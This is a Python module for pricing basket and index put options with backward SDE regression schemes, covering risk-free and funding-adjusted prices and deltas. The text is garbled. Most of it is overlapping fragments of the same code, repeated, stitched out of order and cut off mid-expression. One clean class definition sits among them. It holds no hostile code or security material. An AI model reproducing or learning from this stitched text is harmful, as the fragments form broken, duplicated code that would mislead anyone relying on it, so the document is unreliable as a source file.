counterparty_bond_yield = 0 counterparty_bond_repo_rate = 0 
variation_margin_interest_rate = 0.1 stock_repo_rate = 0.07", "self.counterparty_bond_repo_rate + self.variation_margin_interest_rate) * delta_t * np.einsum('j, ijk-> ik', regression_coeff[0, :], expect_brownian_basis) adjusted_price", "delta_t, expect_basis, self.bank_bond_yield + self.counterparty_bond_yield - self.counterparty_bond_repo_rate , regression_coeff[6, :], regression_coeff[7:12, :], adjusted_delta)\\", "range(self.num_of_brownian_motion): rec[:, i + 2 +self.num_of_brownian_motion] = adjusted_delta[:, i] return rec # Reference", "= adjusted_delta[:, i] return rec # Reference Solution reference_riskfree = False refererce_adjust =", "i in range(1,6): rec[:, i] = delta[:, i-1] rec[:, 6] = adjusted_derivative.reshape(-1) for", "delta_t * theta[0]) def riskfree_scheme_delta(self, theta, delta_t, expect_basis, expect_brownian_basis, rate, price_coefficient, delta_coefficient): riskfree_delta", "1)), adjusted_delta, adjusted_price.reshape((-1, 1)) # Regression functions and parameters sorting_method = \"Geometric Intrinsic", "self.riskfree_scheme_delta(theta, delta_t, expect_basis, expect_brownian_basis, self.riskless_rate, regression_coeff[0, :], regression_coeff[1:6, :]) riskfree_price = self.riskfree_scheme_price(theta, delta_t,", "- self.counterparty_bond_repo_rate , regression_coeff[6, :], regression_coeff[7:12, :])\\ + (1/theta[1]) * (1-theta[1]) * (self.bank_bond_yield", "+ (self.bank_bond_yield + self.counterparty_bond_yield - self.counterparty_bond_repo_rate) * delta_t * theta[0])\\ + delta_t *", "for i in range(1,6): rec[:, i] = delta[:, i-1] rec[:, 6] = adjusted_derivative.reshape(-1)", "expect_brownian_basis): riskfree_delta = self.riskfree_scheme_delta(theta, delta_t, expect_basis, expect_brownian_basis, self.riskless_rate, regression_coeff[0, :], regression_coeff[1:1+self.num_of_brownian_motion, :]) riskfree_price", "self.riskfree_scheme_price(theta, delta_t, expect_basis, self.bank_bond_yield + self.counterparty_bond_yield - 
self.counterparty_bond_repo_rate , regression_coeff[1+self.num_of_brownian_motion, :], regression_coeff[2+self.num_of_brownian_motion:2+2*self.num_of_brownian_motion, :],", "= 0. self.variation_margin_interest_rate = 0.1 self.stock_repo_rate = 0.07 * np.ones(dimension, dtype=float) # Stock", "np.ones(dimension, dtype=np.single) self.strike = 40. self.terminal_time = 1. self.buy_sell = 1. self.put_call =", "1 + 5 + 1 + 5 def regression_variable(self, no_of_samples, derivative, delta, adjusted_derivative,", "expect_brownian_basis, self.riskless_rate, regression_coeff[0, :], regression_coeff[1:6, :]) riskfree_price = self.riskfree_scheme_price(theta, delta_t, expect_basis, self.riskless_rate ,", "expect_brownian_basis, self.riskless_rate, regression_coeff[0, :], regression_coeff[1:1+self.num_of_brownian_motion, :]) riskfree_price = self.riskfree_scheme_price(theta, delta_t, expect_basis, self.riskless_rate ,", "numerical_scheme(self, theta, delta_t, regression_coeff, expect_basis, expect_brownian_basis): riskfree_delta = self.riskfree_scheme_delta(theta, delta_t, expect_basis, expect_brownian_basis, self.riskless_rate,", "for all specific example and the numerical scheme for the BSDE. .. 
todo::", "class ArithmeticBasketPut(): def __init__(self, dimension): # Example Information self.name = \"Arithmetic basket put", "functions riskless_rate = 0.05 divident_yield = np.zeros(num_of_assets, dtype=float) bank_bond_yield = 0 counterparty_bond_yield =", "expect_basis, expect_brownian_basis, self.riskless_rate, regression_coeff[0, :], regression_coeff[1:1+self.num_of_brownian_motion, :]) riskfree_price = self.riskfree_scheme_price(theta, delta_t, expect_basis, self.riskless_rate", "\"Intrinsic Value\" self.basis = \"Intrinsic Value\" self.basis_order = 3 self.no_of_regression = 1 +", "delta_t, expect_basis, expect_brownian_basis, self.riskless_rate, regression_coeff[0, :], regression_coeff[1:1+self.num_of_brownian_motion, :]) riskfree_price = self.riskfree_scheme_price(theta, delta_t, expect_basis,", "np.einsum('j, ijk-> ik', price_coefficient, expect_brownian_basis)\\ - delta_t * (1-theta[1]) * (1/theta[1]) * np.einsum('i,", "adjusted_delta): rec = np.empty((no_of_samples, self.no_of_regression)) rec[:,0] = derivative.reshape(-1) for i in range(1,6): rec[:,", "Stock parameters stock_model = \"BS\" initial_value = np.array([0.01, 0.01, 0.01, 0.01, 0.01]) num_of_assets", "0.],\\ [0.79, 0.613107, 0., 0., 0.],\\ [0.82, 0.134071, 0.556439, 0., 0.],\\ [0.91, 0.132277,", "0.613107, 0., 0., 0.],\\ [0.82, 0.134071, 0.556439, 0., 0.],\\ [0.91, 0.132277, 0.0109005, 0.39279,", "self.divident_yield - self.stock_repo_rate)/self.sigma_bar, self.cholesky_inverse, delta_coefficient, expect_brownian_basis) return riskfree_delta def numerical_scheme(self, theta, delta_t, regression_coeff,", "and parameters self.sorting_method = \"Intrinsic Value\" self.basis = \"Intrinsic Value\" self.basis_order = 3", "ji, jk, lkm -> lm', \\ (self.mu_bar + self.divident_yield - self.stock_repo_rate)/self.sigma_bar, self.cholesky_inverse, delta_coefficient,", "0.01, 0.01, 0.01]) num_of_assets = 5 num_of_brownian_motion = 5 mu_bar = 0.05 *", "to the function file \"\"\" import numpy as np 
class GermenIndexPut(): # Example", "0. self.counterparty_bond_yield = 0. self.counterparty_bond_repo_rate = 0. self.variation_margin_interest_rate = 0.1 self.stock_repo_rate = 0.06", "0.01]) num_of_assets = 5 num_of_brownian_motion = 5 mu_bar = 0.05 * np.ones(num_of_assets, dtype=float)", ":], expect_brownian_basis) adjusted_price = self.riskfree_scheme_price(theta, delta_t, expect_basis, self.bank_bond_yield + self.counterparty_bond_yield - self.counterparty_bond_repo_rate ,", "* rate * delta_t) * np.einsum('j, ij-> i',price_coefficient, expect_basis)\\ - delta_t * theta[0]", "self.no_of_regression)) rec[:,0] = derivative.reshape(-1) for i in range(1,6): rec[:, i] = delta[:, i-1]", "1. buy_sell = -1. put_call = \"Put\" # Regression functions and parameters sorting_method", "Market parameters and functions riskless_rate = 0.05 divident_yield = np.zeros(num_of_assets, dtype=float) bank_bond_yield =", "expect_basis) / (1 + (self.bank_bond_yield + self.counterparty_bond_yield - self.counterparty_bond_repo_rate) * delta_t * theta[0])", "\"Put\" # Regression functions and parameters sorting_method = \"Intrinsic Value\" basis = \"Intrinsic", "np.ones(dimension) self.correlation_matrix = 0.75 * np.identity(dimension) + 0.25 * np.ones((dimension, dimension)) self.cholesky_decomposition =", "Moving the numerical scheme to the function file \"\"\" import numpy as np", "dimension = 5 # Stock parameters stock_model = \"BS\" initial_value = np.array([0.01, 0.01,", "all specific example and the numerical scheme for the BSDE. .. 
todo:: Moving", "1 + self.num_of_brownian_motion def riskfree_scheme_price(self, theta, delta_t, expect_basis, rate, price_coefficient, delta_coefficient, delta_process): temp", "\\ - (1-theta[1]) * (1/theta[1]) * np.einsum('ij, kj ->ik', expect_basis, delta_coefficient)\\ + (1/theta[1])", "+ self.counterparty_bond_yield - self.counterparty_bond_repo_rate) * delta_t * theta[0]) return riskfree_delta, riskfree_price.reshape((-1, 1)), adjusted_delta,", "parameters sorting_method = \"Intrinsic Value\" basis = \"Intrinsic Value\" basis_order = 3 no_of_regression", "= 40. self.terminal_time = 1. self.buy_sell = 1. self.put_call = \"Put\" # Regression", "+ delta_t * (1 - theta[0]) * (self.bank_bond_yield + self.counterparty_bond_yield - self.counterparty_bond_repo_rate +", "lkm -> lm', \\ (self.mu_bar + self.divident_yield - self.stock_repo_rate)/self.sigma_bar, self.cholesky_inverse, delta_coefficient, expect_brownian_basis) return", "rec = np.empty((no_of_samples, self.no_of_regression)) rec[:,0] = derivative.reshape(-1) for i in range(1,6): rec[:, i]", "and functions self.riskless_rate = 0.06 self.bank_bond_yield = 0. self.counterparty_bond_yield = 0. 
self.counterparty_bond_repo_rate =", "# Example Information name = \"Put option for a 5 stocks German index", "and functions riskless_rate = 0.05 divident_yield = np.zeros(num_of_assets, dtype=float) bank_bond_yield = 0 counterparty_bond_yield", "0.05 divident_yield = np.zeros(num_of_assets, dtype=float) bank_bond_yield = 0 counterparty_bond_yield = 0 counterparty_bond_repo_rate =", "+ rate * delta_t * theta[0]) def riskfree_scheme_delta(self, theta, delta_t, expect_basis, expect_brownian_basis, rate,", "self.riskless_rate, regression_coeff[0, :], regression_coeff[1:1+self.num_of_brownian_motion, :]) riskfree_price = self.riskfree_scheme_price(theta, delta_t, expect_basis, self.riskless_rate , regression_coeff[0,", "dimension): # Example Information self.name = \"Arithmetic basket put option for BS model\"", "on Mon May 14 17:21:26 2018 @author: <NAME> This file holds the parameters", "self.bank_bond_yield = 0. self.counterparty_bond_yield = 0. self.counterparty_bond_repo_rate = 0. self.variation_margin_interest_rate = 0.1 self.stock_repo_rate", "0 variation_margin_interest_rate = 0.1 stock_repo_rate = 0.07 * np.ones(num_of_assets, dtype=float) def riskfree_scheme_price(self, theta,", "dtype=float) self.mu_bar = self.riskless_rate - self.divident_yield self.sigma_bar = 0.2 * np.ones(dimension) self.correlation_matrix =", "dtype=float) def riskfree_scheme_price(self, theta, delta_t, expect_basis, rate, price_coefficient, delta_coefficient, delta_process): temp = \\", "delta_coefficient, expect_brownian_basis) return riskfree_delta def numerical_scheme(self, theta, delta_t, regression_coeff, expect_basis, expect_brownian_basis): riskfree_delta =", "self.counterparty_bond_repo_rate + self.variation_margin_interest_rate) *\\ np.einsum('j, ij-> i', regression_coeff[0, :], expect_basis) / (1 +", "* np.einsum('j, ijk-> ik', price_coefficient, expect_brownian_basis)\\ - delta_t * (1-theta[1]) * (1/theta[1]) *", "self.riskfree_scheme_price(theta, delta_t, expect_basis, 
self.riskless_rate , regression_coeff[0, :], regression_coeff[1:6, :], riskfree_delta) adjusted_delta = \\", "riskfree_delta def numerical_scheme(self, theta, delta_t, regression_coeff, expect_basis, expect_brownian_basis): riskfree_delta = self.riskfree_scheme_delta(theta, delta_t, expect_basis,", "theta, delta_t, expect_basis, expect_brownian_basis, rate, price_coefficient, delta_coefficient): riskfree_delta = \\ - (1-theta[1]) *", "= \"Arithmetic basket put option for BS model\" self.dimension = dimension # Market", "- self.divident_yield self.sigma_bar = 0.2 * np.ones(dimension) self.correlation_matrix = 0.75 * np.identity(dimension) +", "+ self.counterparty_bond_yield - self.counterparty_bond_repo_rate , regression_coeff[1+self.num_of_brownian_motion,:], regression_coeff[2 + self.num_of_brownian_motion: 2+2* self.num_of_brownian_motion, :])\\ +", "- (1-theta[1]) * (1/theta[1]) * np.einsum('ij, kj ->ik', expect_basis, delta_coefficient)\\ + (1/theta[1]) *", "*\\ riskfree_price/ (1 + (self.bank_bond_yield + self.counterparty_bond_yield - self.counterparty_bond_repo_rate) * delta_t * theta[0])\\", "= 0.07 * np.ones(dimension, dtype=float) # Stock parameters self.stock_model = \"BS\" self.initial_value =", "return riskfree_delta def numerical_scheme(self, theta, delta_t, regression_coeff, expect_basis, expect_brownian_basis): riskfree_delta = self.riskfree_scheme_delta(theta, delta_t,", "-> l', (self.mu_bar + self.divident_yield - self.stock_repo_rate)/self.sigma_bar, self.cholesky_inverse, delta_coefficient, expect_basis) return temp /", "= 0 variation_margin_interest_rate = 0.1 stock_repo_rate = 0.07 * np.ones(num_of_assets, dtype=float) def riskfree_scheme_price(self,", "self.counterparty_bond_repo_rate) * delta_t * theta[0]) return riskfree_delta, riskfree_price.reshape((-1, 1)), adjusted_delta, adjusted_price.reshape((-1, 1)) #", "+ self.counterparty_bond_yield - self.counterparty_bond_repo_rate + self.variation_margin_interest_rate) *\\ riskfree_price/ (1 + 
(self.bank_bond_yield + self.counterparty_bond_yield", "= adjusted_delta[:, i-7] return rec # Reference Solution reference_riskfree = False refererce_adjust =", "\"Arithmetic basket put option for BS model\" self.dimension = dimension # Market parameters", "self.stock_repo_rate)/self.sigma_bar, self.cholesky_inverse, delta_coefficient, expect_basis) return temp / (1 + rate * delta_t *", "rate, price_coefficient, delta_coefficient): riskfree_delta = \\ - (1-theta[1]) * (1/theta[1]) * np.einsum('ij, kj", "no_of_regression = 1 + 5 + 1 + 5 def regression_variable(self, no_of_samples, derivative,", "adjusted_price.reshape((-1, 1)) # Product parameters weight = np.array([38.1, 6.5, 5.7, 27.0, 22.7], dtype=np.double)", "-> k', (self.mu_bar + self.divident_yield - self.stock_repo_rate)/self.sigma_bar, self.cholesky_inverse, delta_process)\\ - delta_t * (1", "= 1. self.put_call = \"Put\" # Regression functions and parameters self.sorting_method = \"Intrinsic", "riskfree_price.reshape((-1, 1)), adjusted_delta, adjusted_price.reshape((-1, 1)) # Regression functions and parameters sorting_method = \"Geometric", "self.sigma_bar = 0.2 * np.ones(dimension) self.correlation_matrix = 0.75 * np.identity(dimension) + 0.25 *", "riskfree_scheme_price(self, theta, delta_t, expect_basis, rate, price_coefficient, delta_coefficient, delta_process): temp = \\ (1 -", "* np.einsum('i, ji, jk, lkm -> lm', \\ (self.mu_bar + self.divident_yield - self.stock_repo_rate)/self.sigma_bar,", "delta_t, regression_coeff, expect_basis, expect_brownian_basis): riskfree_delta = self.riskfree_scheme_delta(theta, delta_t, expect_basis, expect_brownian_basis, self.riskless_rate, regression_coeff[0, :],", "= np.array([0.01, 0.01, 0.01, 0.01, 0.01]) num_of_assets = 5 num_of_brownian_motion = 5 mu_bar", "np.einsum('i, ji, kj -> k', (self.mu_bar + self.divident_yield - self.stock_repo_rate)/self.sigma_bar, self.cholesky_inverse, delta_process)\\ -", "for a 5 stocks German index model\" dimension = 5 # Stock 
class ArithmeticBasketPut():
    """Arithmetic basket put option on ``dimension`` correlated Black-Scholes stocks.

    Bundles the market, product and regression parameters of this example and
    implements one step of the theta time-discretisation for the risk-free
    BSDE price/delta as well as for the funding/collateral adjusted
    (xVA) price/delta.
    """

    def __init__(self, dimension):
        """Set up all model parameters for a basket of ``dimension`` stocks."""
        # Example Information
        self.name = "Arithmetic basket put option for BS model"
        self.dimension = dimension
        # Market parameters and functions
        self.riskless_rate = 0.06
        self.bank_bond_yield = 0.
        self.counterparty_bond_yield = 0.
        self.counterparty_bond_repo_rate = 0.
        self.variation_margin_interest_rate = 0.1
        self.stock_repo_rate = 0.07 * np.ones(dimension, dtype=float)
        # Stock parameters
        self.stock_model = "BS"
        self.initial_value = 40. * np.ones(dimension)
        self.num_of_assets = dimension
        self.num_of_brownian_motion = dimension
        # NOTE(review): attribute spelling ("divident") kept for
        # backward compatibility -- other modules read these names.
        self.divident_yield = np.zeros(dimension, dtype=float)
        self.mu_bar = self.riskless_rate - self.divident_yield
        self.sigma_bar = 0.2 * np.ones(dimension)
        # Equicorrelated stocks: 1.0 on the diagonal, 0.25 off-diagonal.
        self.correlation_matrix = 0.75 * np.identity(dimension) \
            + 0.25 * np.ones((dimension, dimension))
        self.cholesky_decomposition = np.linalg.cholesky(self.correlation_matrix)
        self.cholesky_inverse = np.linalg.inv(self.cholesky_decomposition)
        # Product parameters
        # NOTE(review): np.single kept as in the original file even though the
        # rest of the parameters are float64 -- confirm before changing.
        self.weight = 1/dimension * np.ones(dimension, dtype=np.single)
        self.strike = 40.
        self.terminal_time = 1.
        self.buy_sell = 1.
        self.put_call = "Put"
        # Regression functions and parameters
        self.sorting_method = "Intrinsic Value"
        self.basis = "Intrinsic Value"
        self.basis_order = 3
        # Layout of the regression target: price, deltas,
        # adjusted price, adjusted deltas.
        self.no_of_regression = 1 + self.num_of_brownian_motion \
            + 1 + self.num_of_brownian_motion

    def _risk_premium(self):
        """Per-asset market price of risk vector (mu + q - repo) / sigma."""
        return (self.mu_bar + self.divident_yield - self.stock_repo_rate) \
            / self.sigma_bar

    def riskfree_scheme_price(self, theta, delta_t, expect_basis, rate,
                              price_coefficient, delta_coefficient,
                              delta_process):
        """One theta-scheme step for the conditional price at rate ``rate``.

        theta[0] weights the implicit (theta[0]) vs. explicit (1-theta[0])
        part of the driver; ``expect_basis`` holds the conditional-expectation
        basis evaluations per sample, ``price_coefficient``/``delta_coefficient``
        the regression coefficients of price and delta, and ``delta_process``
        the current delta samples. Returns one price value per sample.
        """
        risk_premium = self._risk_premium()
        temp = \
            (1 - (1 - theta[0]) * rate * delta_t) \
            * np.einsum('j, ij-> i', price_coefficient, expect_basis) \
            - delta_t * theta[0] \
            * np.einsum('i, ji, kj -> k', risk_premium,
                        self.cholesky_inverse, delta_process) \
            - delta_t * (1 - theta[0]) \
            * np.einsum('i, ji, jk, lk -> l', risk_premium,
                        self.cholesky_inverse, delta_coefficient, expect_basis)
        # Implicit part of the discounting moved to the denominator.
        return temp / (1 + rate * delta_t * theta[0])

    def riskfree_scheme_delta(self, theta, delta_t, expect_basis,
                              expect_brownian_basis, rate,
                              price_coefficient, delta_coefficient):
        """One theta-scheme step for the conditional delta at rate ``rate``.

        theta[1] weights the delta part of the scheme; ``expect_brownian_basis``
        holds the basis-times-Brownian-increment conditional expectations.
        Returns one delta row (per Brownian motion) per sample.
        """
        risk_premium = self._risk_premium()
        riskfree_delta = \
            - (1 - theta[1]) * (1/theta[1]) \
            * np.einsum('ij, kj ->ik', expect_basis, delta_coefficient) \
            + (1/theta[1]) * (1 - (1 - theta[1]) * rate * delta_t) \
            * np.einsum('j, ijk-> ik', price_coefficient, expect_brownian_basis) \
            - delta_t * (1 - theta[1]) * (1/theta[1]) \
            * np.einsum('i, ji, jk, lkm -> lm', risk_premium,
                        self.cholesky_inverse, delta_coefficient,
                        expect_brownian_basis)
        return riskfree_delta

    def numerical_scheme(self, theta, delta_t, regression_coeff,
                         expect_basis, expect_brownian_basis):
        """Advance one time step of the full (risk-free + adjusted) scheme.

        ``regression_coeff`` rows are laid out as price, deltas, adjusted
        price, adjusted deltas (see ``no_of_regression``). Returns
        (riskfree_delta, riskfree_price, adjusted_delta, adjusted_price)
        with prices reshaped to column vectors.
        """
        m = self.num_of_brownian_motion
        # Funding rate of the adjusted BSDE and its total spread over
        # collateral remuneration; factored out of the repeated expressions.
        funding_rate = self.bank_bond_yield + self.counterparty_bond_yield \
            - self.counterparty_bond_repo_rate
        total_spread = funding_rate + self.variation_margin_interest_rate
        # Named slices of the regression-coefficient layout.
        price_coeff = regression_coeff[0, :]
        delta_coeff = regression_coeff[1:1 + m, :]
        adj_price_coeff = regression_coeff[1 + m, :]
        adj_delta_coeff = regression_coeff[2 + m: 2 + 2*m, :]

        riskfree_delta = self.riskfree_scheme_delta(
            theta, delta_t, expect_basis, expect_brownian_basis,
            self.riskless_rate, price_coeff, delta_coeff)
        riskfree_price = self.riskfree_scheme_price(
            theta, delta_t, expect_basis, self.riskless_rate,
            price_coeff, delta_coeff, riskfree_delta)

        adjusted_delta = \
            self.riskfree_scheme_delta(
                theta, delta_t, expect_basis, expect_brownian_basis,
                funding_rate, adj_price_coeff, adj_delta_coeff) \
            + (1/theta[1]) * (1 - theta[1]) * total_spread * delta_t \
            * np.einsum('j, ijk-> ik', price_coeff, expect_brownian_basis)

        # Implicit discount factor of the adjusted price equation.
        discount = 1 + funding_rate * delta_t * theta[0]
        adjusted_price = \
            self.riskfree_scheme_price(
                theta, delta_t, expect_basis, funding_rate,
                adj_price_coeff, adj_delta_coeff, adjusted_delta) \
            + delta_t * theta[0] * total_spread * riskfree_price / discount \
            + delta_t * (1 - theta[0]) * total_spread \
            * np.einsum('j, ij-> i', price_coeff, expect_basis) / discount

        return riskfree_delta, riskfree_price.reshape((-1, 1)), \
            adjusted_delta, adjusted_price.reshape((-1, 1))

    def regression_variable(self, no_of_samples, derivative, delta,
                            adjusted_derivative, adjusted_delta):
        """Stack price/delta samples into the regression design matrix.

        Column layout matches ``no_of_regression``: price, the m deltas,
        adjusted price, the m adjusted deltas.
        """
        m = self.num_of_brownian_motion
        rec = np.empty((no_of_samples, self.no_of_regression))
        rec[:, 0] = derivative.reshape(-1)
        for i in range(m):
            rec[:, i + 1] = delta[:, i]
        rec[:, 1 + m] = adjusted_derivative.reshape(-1)
        for i in range(m):
            rec[:, i + 2 + m] = adjusted_delta[:, i]
        return rec

    # Reference Solution (no closed-form benchmark for this example).
    reference_riskfree = False
    # NOTE(review): misspelling kept -- callers may look this name up.
    refererce_adjust = False
\"\"\" import numpy as np class GermenIndexPut(): # Example Information", "parameters and functions riskless_rate = 0.05 divident_yield = np.zeros(num_of_assets, dtype=float) bank_bond_yield = 0", "self.buy_sell = 1. self.put_call = \"Put\" def riskfree_scheme_price(self, theta, delta_t, expect_basis, rate, price_coefficient,", "self.counterparty_bond_yield = 0. self.counterparty_bond_repo_rate = 0. self.variation_margin_interest_rate = 0.1 self.stock_repo_rate = 0.06 *", "0.25 * np.ones((dimension, dimension)) self.cholesky_decomposition = np.linalg.cholesky(self.correlation_matrix) self.cholesky_inverse = np.linalg.inv(self.cholesky_decomposition) # Product parameters", "= 1. self.buy_sell = 1. self.put_call = \"Put\" def riskfree_scheme_price(self, theta, delta_t, expect_basis,", "+ self.num_of_brownian_motion: 2+2* self.num_of_brownian_motion, :])\\ + (1/theta[1]) * (1-theta[1]) * (self.bank_bond_yield + self.counterparty_bond_yield", "0. self.variation_margin_interest_rate = 0.1 self.stock_repo_rate = 0.06 * np.ones(dimension, dtype=float) # Stock parameters", "no_of_samples, derivative, delta, adjusted_derivative, adjusted_delta): rec = np.empty((no_of_samples, self.no_of_regression)) rec[:,0] = derivative.reshape(-1) for", "regression_coeff[2+self.num_of_brownian_motion:2+2*self.num_of_brownian_motion, :], adjusted_delta)\\ + delta_t * theta[0] * (self.bank_bond_yield + self.counterparty_bond_yield - self.counterparty_bond_repo_rate", "5.7, 27.0, 22.7], dtype=np.double) strike = 1. terminal_time = 1. 
buy_sell = -1.", "+ (self.bank_bond_yield + self.counterparty_bond_yield - self.counterparty_bond_repo_rate) * delta_t * theta[0]) return riskfree_delta, riskfree_price.reshape((-1,", "adjusted_derivative.reshape(-1) for i in range(self.num_of_brownian_motion): rec[:, i + 2 +self.num_of_brownian_motion] = adjusted_delta[:, i]", "in range(self.num_of_brownian_motion): rec[:, i + 2 +self.num_of_brownian_motion] = adjusted_delta[:, i] return rec #", "i] return rec # Reference Solution reference_riskfree = False refererce_adjust = False #", "= self.riskfree_scheme_price(theta, delta_t, expect_basis, self.bank_bond_yield + self.counterparty_bond_yield - self.counterparty_bond_repo_rate , regression_coeff[1+self.num_of_brownian_motion, :], regression_coeff[2+self.num_of_brownian_motion:2+2*self.num_of_brownian_motion,", "* (self.bank_bond_yield + self.counterparty_bond_yield - self.counterparty_bond_repo_rate + self.variation_margin_interest_rate) * delta_t * np.einsum('j, ijk->", "rec[:, i] = delta[:, i-1] rec[:, 6] = adjusted_derivative.reshape(-1) for i in range(7,12):", "0.],\\ [0.84, 0.157232, 0.0181865, 0.291768, 0.429207]]) cholesky_inverse = np.linalg.inv(cholesky_decomposition) # Market parameters and", "* delta_t * np.einsum('j, ijk-> ik', regression_coeff[0, :], expect_brownian_basis) adjusted_price = self.riskfree_scheme_price(theta, delta_t,", "+ (1/theta[1]) * (1-theta[1]) * (self.bank_bond_yield + self.counterparty_bond_yield - self.counterparty_bond_repo_rate + self.variation_margin_interest_rate) *", "self.riskless_rate - self.divident_yield self.sigma_bar = 0.2 * np.ones(dimension) self.correlation_matrix = 0.75 * np.identity(dimension)", "0.1 self.stock_repo_rate = 0.06 * np.ones(dimension, dtype=float) # Stock parameters self.stock_model = \"BS\"", "Value\" basis_order = 2 no_of_regression = 1 + 5 + 1 + 5", "= np.zeros(num_of_assets, dtype=float) bank_bond_yield = 0 counterparty_bond_yield = 0 counterparty_bond_repo_rate = 0 
variation_margin_interest_rate", "and parameters sorting_method = \"Geometric Intrinsic Value\" basis = \"Geometric Intrinsic Value\" basis_order", "+ self.variation_margin_interest_rate) * delta_t * np.einsum('j, ijk-> ik', regression_coeff[0, :], expect_brownian_basis) adjusted_price =", "self.counterparty_bond_yield - self.counterparty_bond_repo_rate , regression_coeff[6, :], regression_coeff[7:12, :])\\ + (1/theta[1]) * (1-theta[1]) *", "+ self.divident_yield - self.stock_repo_rate)/self.sigma_bar, self.cholesky_inverse, delta_process)\\ - delta_t * (1 - theta[0]) *", "* delta_t * theta[0]) return riskfree_delta, riskfree_price.reshape((-1, 1)), adjusted_delta, adjusted_price.reshape((-1, 1)) # Regression", "* np.einsum('ij, kj ->ik', expect_basis, delta_coefficient)\\ + (1/theta[1]) * (1-(1-theta[1]) * rate *", "self.cholesky_inverse = np.linalg.inv(self.cholesky_decomposition) # Product parameters self.weight = 1/dimension * np.ones(dimension, dtype=np.single) self.strike", "dimension # Market parameters and functions self.riskless_rate = 0.06 self.bank_bond_yield = 0. 
self.counterparty_bond_yield", "return riskfree_delta, riskfree_price.reshape((-1, 1)), adjusted_delta, adjusted_price.reshape((-1, 1)) def regression_variable(self, no_of_samples, derivative, delta, adjusted_derivative,", "+ self.num_of_brownian_motion + 1 + self.num_of_brownian_motion def riskfree_scheme_price(self, theta, delta_t, expect_basis, rate, price_coefficient,", "+ 1 + 5 def regression_variable(self, no_of_samples, derivative, delta, adjusted_derivative, adjusted_delta): rec =", "0 counterparty_bond_repo_rate = 0 variation_margin_interest_rate = 0.1 stock_repo_rate = 0.07 * np.ones(num_of_assets, dtype=float)", "expect_brownian_basis, self.bank_bond_yield + self.counterparty_bond_yield - self.counterparty_bond_repo_rate , regression_coeff[6, :], regression_coeff[7:12, :])\\ + (1/theta[1])", "range(7,12): rec[:, i] = adjusted_delta[:, i-7] return rec # Reference Solution reference_riskfree =", "0.07 * np.ones(num_of_assets, dtype=float) def riskfree_scheme_price(self, theta, delta_t, expect_basis, rate, price_coefficient, delta_coefficient, delta_process):", "(1 + rate * delta_t * theta[0]) def riskfree_scheme_delta(self, theta, delta_t, expect_basis, expect_brownian_basis,", "regression_coeff[1+self.num_of_brownian_motion, :], regression_coeff[2+self.num_of_brownian_motion:2+2*self.num_of_brownian_motion, :], adjusted_delta)\\ + delta_t * theta[0] * (self.bank_bond_yield + self.counterparty_bond_yield", "= np.empty((no_of_samples, self.no_of_regression)) rec[:,0] = derivative.reshape(-1) for i in range(1,6): rec[:, i] =", "self.counterparty_bond_yield - self.counterparty_bond_repo_rate + self.variation_margin_interest_rate) * delta_t * np.einsum('j, ijk-> ik', regression_coeff[0, :],", "adjusted_delta, adjusted_price.reshape((-1, 1)) # Product parameters weight = np.array([38.1, 6.5, 5.7, 27.0, 22.7],", "self.counterparty_bond_yield - self.counterparty_bond_repo_rate , regression_coeff[1+self.num_of_brownian_motion,:], regression_coeff[2 + 
self.num_of_brownian_motion: 2+2* self.num_of_brownian_motion, :])\\ + (1/theta[1])", ", regression_coeff[0, :], regression_coeff[1:1+self.num_of_brownian_motion, :], riskfree_delta) adjusted_delta = \\ self.riskfree_scheme_delta(theta, delta_t, expect_basis, expect_brownian_basis,", "= derivative.reshape(-1) for i in range(self.num_of_brownian_motion): rec[:, i+1] = delta[:, i] rec[:, 1+self.num_of_brownian_motion]", "6.5, 5.7, 27.0, 22.7], dtype=np.double) strike = 1. terminal_time = 1. buy_sell =", "delta, adjusted_derivative, adjusted_delta): rec = np.empty((no_of_samples, self.no_of_regression)) rec[:,0] = derivative.reshape(-1) for i in", "(1 + (self.bank_bond_yield + self.counterparty_bond_yield - self.counterparty_bond_repo_rate) * delta_t * theta[0]) return riskfree_delta,", "np.array([0.518, 0.648, 0.623, 0.570, 0.530]) cholesky_decomposition = np.array([[1., 0., 0., 0., 0.],\\ [0.79,", "+ 5 + 1 + 5 def regression_variable(self, no_of_samples, derivative, delta, adjusted_derivative, adjusted_delta):", "functions and parameters self.sorting_method = \"Intrinsic Value\" self.basis = \"Intrinsic Value\" self.basis_order =", "* delta_t * theta[0]) def riskfree_scheme_delta(self, theta, delta_t, expect_basis, expect_brownian_basis, rate, price_coefficient, delta_coefficient):", "Solution reference_riskfree = False reference_riskfree_price = -0.175866 refererce_adjust = False class ArithmeticBasketPut(): def", "def __init__(self, dimension): # Market parameters and functions self.riskless_rate = 0.06 self.bank_bond_yield =", "rec[:, i + 2 +self.num_of_brownian_motion] = adjusted_delta[:, i] return rec # Reference Solution", "0.648, 0.623, 0.570, 0.530]) cholesky_decomposition = np.array([[1., 0., 0., 0., 0.],\\ [0.79, 0.613107,", "i-7] return rec # Reference Solution reference_riskfree = False reference_riskfree_price = -0.175866 refererce_adjust", "(self.bank_bond_yield + self.counterparty_bond_yield - self.counterparty_bond_repo_rate + 
self.variation_margin_interest_rate) *\\ riskfree_price/ (1 + (self.bank_bond_yield +", "0.429207]]) cholesky_inverse = np.linalg.inv(cholesky_decomposition) # Market parameters and functions riskless_rate = 0.05 divident_yield", ", regression_coeff[1+self.num_of_brownian_motion,:], regression_coeff[2 + self.num_of_brownian_motion: 2+2* self.num_of_brownian_motion, :])\\ + (1/theta[1]) * (1-theta[1]) *", "= np.array([0.518, 0.648, 0.623, 0.570, 0.530]) cholesky_decomposition = np.array([[1., 0., 0., 0., 0.],\\", "refererce_adjust = False class ArithmeticBasketPut(): def __init__(self, dimension): # Example Information self.name =", "rec[:,0] = derivative.reshape(-1) for i in range(self.num_of_brownian_motion): rec[:, i+1] = delta[:, i] rec[:,", "BS model\" self.dimension = dimension # Market parameters and functions self.riskless_rate = 0.06", "rec = np.empty((no_of_samples, self.no_of_regression)) rec[:,0] = derivative.reshape(-1) for i in range(self.num_of_brownian_motion): rec[:, i+1]", "\\ (1 - (1-theta[0]) * rate * delta_t) * np.einsum('j, ij-> i',price_coefficient, expect_basis)\\", "np.empty((no_of_samples, self.no_of_regression)) rec[:,0] = derivative.reshape(-1) for i in range(1,6): rec[:, i] = delta[:,", "specific example and the numerical scheme for the BSDE. .. 
